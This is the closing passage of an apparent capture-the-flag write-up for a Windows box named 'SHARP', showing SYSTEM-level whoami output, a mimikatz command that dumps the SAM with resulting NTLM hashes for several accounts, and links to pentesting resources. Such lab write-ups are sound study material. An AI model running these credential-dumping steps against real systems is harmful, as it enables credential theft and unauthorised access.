id="https://www.notion.so/e256a6c0dbd14231be1e95cbacccf40c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384</span></span></span></code></pre></li><li id="https://www.notion.so/cddaa8fd086749ea8d56887d2f341b90" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Shell seems to be unstable and collapses after a minute, as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> kills the connection on timeout.</span></span></li><li id="https://www.notion.so/a9d92cc1a975470ea7d677670103046e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/0393109d04974f919a011295e20e644c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0393109d04974f919a011295e20e644c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9fa90fc04b38423890e698135cb63438" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get NTLM hash with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">mimikatz</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/21a5589aad3140a483424af2b0c9f4c2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> ./mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"</code></span></span></p></div><pre id="https://www.notion.so/7609df2cbe4946199897982a69bc6bd2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
560 {0;000003e7} 1 D 34701 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 1597101 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 1617230 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::sam
Domain : SHARP
SysKey : 16d3cbceb100e487ba2614447fede88d
Local SID : S-1-5-21-294878639-2649470188-886412631
SAMKey : 058e78fa26734778bb823e660e3b0c25
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 9e2ede4a0c81d4ca7630ef1e8d30afb7
RID : 000003ee (1006)
User : debug
Hash NTLM: 6c7d1f972008d581e788e7c24585d2bf
RID : 000003ef (1007)
User : lars
Hash NTLM: e5852e8163e71de86599596375a22e5c</span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/8aa4251f9c984d5083710ad81cd8a2c8" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/8aa4251f9c984d5083710ad81cd8a2c8"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/bca526b45e914bd7a65e4d392f3edd90" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://infinitelogins.com/2020/06/17/enumerating-smb-for-pentesting/">https://infinitelogins.com/2020/06/17/enumerating-smb-for-pentesting/</a></span></span></li><li id="https://www.notion.so/4e0ec89d020d474eb90dafebcb225a83" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/">https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/</a></span></span></li><li id="https://www.notion.so/e0e84bcd509a45479c6873fe7272e147" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/tyranid/ExploitRemotingService">https://github.com/tyranid/ExploitRemotingService</a></span></span></li></ol></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>